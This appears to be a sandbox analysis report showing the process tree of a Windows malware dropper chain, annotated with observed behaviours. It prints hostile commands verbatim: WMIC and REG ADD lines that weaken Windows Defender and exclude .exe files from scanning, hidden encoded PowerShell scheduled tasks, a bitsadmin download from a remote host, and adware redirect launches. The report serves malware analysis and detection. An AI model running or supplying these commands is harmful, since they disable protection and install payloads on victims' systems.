C:\Users\Admin\Documents\OQ9NtuO6JHQnY9SFDYgUVVIz.exe"C:\Users\Admin\Documents\OQ9NtuO6JHQnY9SFDYgUVVIz.exe" silent8⤵
- Checks whether UAC is enabled
-
C:\Users\Admin\Documents\dsQPkh9tG0K0PzlTW1QKUBWp.exe"C:\Users\Admin\Documents\dsQPkh9tG0K0PzlTW1QKUBWp.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS3186.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8831.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsxtxXcSD" /SC once /ST 07:45:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 09:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\GfqpmkO.exe\" uG /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\viS4LjrQND00jXigLAPpAiaB.exe"C:\Users\Admin\Documents\viS4LjrQND00jXigLAPpAiaB.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\6523419.scr"C:\Users\Admin\AppData\Roaming\6523419.scr" /S9⤵
-
C:\Users\Admin\AppData\Roaming\5450761.scr"C:\Users\Admin\AppData\Roaming\5450761.scr" /S9⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\3768036.scr"C:\Users\Admin\AppData\Roaming\3768036.scr" /S9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\5443503.scr"C:\Users\Admin\AppData\Roaming\5443503.scr" /S9⤵
-
C:\Users\Admin\Documents\Qb2MIi9oegNnBVbG5gd1YnhC.exe"C:\Users\Admin\Documents\Qb2MIi9oegNnBVbG5gd1YnhC.exe"8⤵
-
C:\Users\Admin\Documents\Qb2MIi9oegNnBVbG5gd1YnhC.exe"C:\Users\Admin\Documents\Qb2MIi9oegNnBVbG5gd1YnhC.exe"9⤵
-
C:\Users\Admin\Documents\E7_q5xma2JVRvdCbEcfyiaua.exe"C:\Users\Admin\Documents\E7_q5xma2JVRvdCbEcfyiaua.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-OUBP7.tmp\E7_q5xma2JVRvdCbEcfyiaua.tmp"C:\Users\Admin\AppData\Local\Temp\is-OUBP7.tmp\E7_q5xma2JVRvdCbEcfyiaua.tmp" /SL5="$30288,506127,422400,C:\Users\Admin\Documents\E7_q5xma2JVRvdCbEcfyiaua.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-0P5RJ.tmp\Adam.exe"C:\Users\Admin\AppData\Local\Temp\is-0P5RJ.tmp\Adam.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\GXOTHDAITP\foldershare.exe"C:\Users\Admin\AppData\Local\Temp\GXOTHDAITP\foldershare.exe" /VERYSILENT11⤵
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 98012⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6060 -s 100812⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\29-60ea1-392-67bba-2ec8794e5ff0c\Jykelaemyge.exe"C:\Users\Admin\AppData\Local\Temp\29-60ea1-392-67bba-2ec8794e5ff0c\Jykelaemyge.exe"11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae88471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae88471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae88471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae88471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae88471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311912⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae88471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcae8846f8,0x7ffcae884708,0x7ffcae88471813⤵
-
C:\Users\Admin\AppData\Local\Temp\60-46ecc-446-50b95-6af7986d1fbd0\Cuqubileny.exe"C:\Users\Admin\AppData\Local\Temp\60-46ecc-446-50b95-6af7986d1fbd0\Cuqubileny.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rjinq32p.uu4\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\rjinq32p.uu4\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\rjinq32p.uu4\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1636 -s 25214⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\24hydtq5.1zb\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\24hydtq5.1zb\installer.exeC:\Users\Admin\AppData\Local\Temp\24hydtq5.1zb\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\41dlso1t.r15\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\41dlso1t.r15\any.exeC:\Users\Admin\AppData\Local\Temp\41dlso1t.r15\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4drdo1w0.5e5\DownFlSetup122.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\4drdo1w0.5e5\DownFlSetup122.exeC:\Users\Admin\AppData\Local\Temp\4drdo1w0.5e5\DownFlSetup122.exe13⤵
-
C:\Users\Admin\AppData\Roaming\5145703.scr"C:\Users\Admin\AppData\Roaming\5145703.scr" /S14⤵
-
C:\Users\Admin\AppData\Roaming\8242869.scr"C:\Users\Admin\AppData\Roaming\8242869.scr" /S14⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\4788150.scr"C:\Users\Admin\AppData\Roaming\4788150.scr" /S14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x0ltwglz.g2v\cust2.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\x0ltwglz.g2v\cust2.exeC:\Users\Admin\AppData\Local\Temp\x0ltwglz.g2v\cust2.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tcxegant.nxf\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\tcxegant.nxf\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\tcxegant.nxf\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 26414⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\grbttkdw.w1x\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\grbttkdw.w1x\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\grbttkdw.w1x\autosubplayer.exe /S13⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pehbuAUvOgr0pPji -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p7MGCcRF8TyEcJi9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\cjArzio\cjArzio.dll" cjArzio14⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\cjArzio\cjArzio.dll" cjArzio15⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc8F2.tmp\tempfile.ps1"14⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\21ulv0vi.ggd\installer.exe /qn CAMPAIGN=654 & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\21ulv0vi.ggd\installer.exeC:\Users\Admin\AppData\Local\Temp\21ulv0vi.ggd\installer.exe /qn CAMPAIGN=65413⤵
-
C:\Users\Admin\Documents\mIlYO2PyRnBpdQPMVtWd6Z5a.exe"C:\Users\Admin\Documents\mIlYO2PyRnBpdQPMVtWd6Z5a.exe"6⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\inst002.exe"C:\Program Files (x86)\Company\NewProduct\inst002.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\3132033.scr"C:\Users\Admin\AppData\Roaming\3132033.scr" /S8⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\2921518.scr"C:\Users\Admin\AppData\Roaming\2921518.scr" /S8⤵
-
C:\Users\Admin\AppData\Roaming\5968173.scr"C:\Users\Admin\AppData\Roaming\5968173.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\8325071.scr"C:\Users\Admin\AppData\Roaming\8325071.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
